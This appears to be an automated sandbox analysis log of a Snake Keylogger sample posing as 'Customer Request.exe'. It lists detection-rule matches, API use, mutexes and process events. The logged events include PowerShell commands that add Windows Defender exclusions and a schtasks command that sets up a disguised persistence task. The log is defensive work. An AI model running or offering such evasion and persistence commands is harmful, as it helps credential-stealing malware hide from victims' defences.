                  Source: 11.2.gCFuOglEso.exe.3e49cc8.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Customer Request.exe.459de50.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Customer Request.exe.459de50.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.gCFuOglEso.exe.3e49cc8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 11.2.gCFuOglEso.exe.3e49cc8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Customer Request.exe.459de50.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Customer Request.exe.459de50.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.Customer Request.exe.457d230.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Customer Request.exe.457d230.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Customer Request.exe.457d230.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Customer Request.exe.457d230.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 11.2.gCFuOglEso.exe.3e49cc8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.gCFuOglEso.exe.3e49cc8.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.gCFuOglEso.exe.3e49cc8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 11.2.gCFuOglEso.exe.3e49cc8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0000000F.00000002.2710539876.0000000002AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0000000F.00000002.2710539876.0000000002CF3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0000000F.00000002.2704268195.0000000000418000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000000.00000002.1490920950.000000000457D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1490920950.000000000457D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0000000A.00000002.2710969497.0000000003152000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0000000B.00000002.1521631813.0000000003E49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000B.00000002.1521631813.0000000003E49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: Customer Request.exe PID: 5944, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Customer Request.exe PID: 5944, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: Customer Request.exe PID: 5932, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: gCFuOglEso.exe PID: 4500, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: gCFuOglEso.exe PID: 4500, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: gCFuOglEso.exe PID: 7388, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.Customer Request.exe.459de50.0.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Customer Request.exe.459de50.0.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Customer Request.exe.459de50.0.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Customer Request.exe.459de50.0.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Customer Request.exe.457d230.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Customer Request.exe.457d230.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Customer Request.exe.457d230.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Customer Request.exe.457d230.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, EqMLXp468anp44vyd9.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, EqMLXp468anp44vyd9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, frwa3jjtrF5QwZLvOa.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, frwa3jjtrF5QwZLvOa.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, frwa3jjtrF5QwZLvOa.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, frwa3jjtrF5QwZLvOa.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, frwa3jjtrF5QwZLvOa.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, frwa3jjtrF5QwZLvOa.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, EqMLXp468anp44vyd9.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, EqMLXp468anp44vyd9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, frwa3jjtrF5QwZLvOa.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, frwa3jjtrF5QwZLvOa.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, frwa3jjtrF5QwZLvOa.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, EqMLXp468anp44vyd9.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, EqMLXp468anp44vyd9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/17@3/3
                  Source: C:\Users\user\Desktop\Customer Request.exeFile created: C:\Users\user\AppData\Roaming\gCFuOglEso.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6408:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeMutant created: NULL
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeMutant created: \Sessions\1\BaseNamedObjects\xVHOUlaxka
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6120:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6748:120:WilError_03
                  Source: C:\Users\user\Desktop\Customer Request.exeFile created: C:\Users\user\AppData\Local\Temp\tmpBA61.tmpJump to behavior
                  Source: Customer Request.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Customer Request.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                  Source: C:\Users\user\Desktop\Customer Request.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Customer Request.exe, 0000000A.00000002.2717700479.000000000410E000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002C88000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2717613443.0000000003A8E000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002C36000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: Customer Request.exeVirustotal: Detection: 40%
                  Source: Customer Request.exeReversingLabs: Detection: 31%
                  Source: C:\Users\user\Desktop\Customer Request.exeFile read: C:\Users\user\Desktop\Customer Request.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Customer Request.exe "C:\Users\user\Desktop\Customer Request.exe"
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gCFuOglEso.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmpBA61.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess created: C:\Users\user\Desktop\Customer Request.exe "C:\Users\user\Desktop\Customer Request.exe"
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess created: C:\Users\user\Desktop\Customer Request.exe "C:\Users\user\Desktop\Customer Request.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\gCFuOglEso.exe C:\Users\user\AppData\Roaming\gCFuOglEso.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmp91E1.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess created: C:\Users\user\AppData\Roaming\gCFuOglEso.exe "C:\Users\user\AppData\Roaming\gCFuOglEso.exe"
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gCFuOglEso.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmpBA61.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess created: C:\Users\user\Desktop\Customer Request.exe "C:\Users\user\Desktop\Customer Request.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess created: C:\Users\user\Desktop\Customer Request.exe "C:\Users\user\Desktop\Customer Request.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmp91E1.tmp"
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess created: C:\Users\user\AppData\Roaming\gCFuOglEso.exe "C:\Users\user\AppData\Roaming\gCFuOglEso.exe"
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
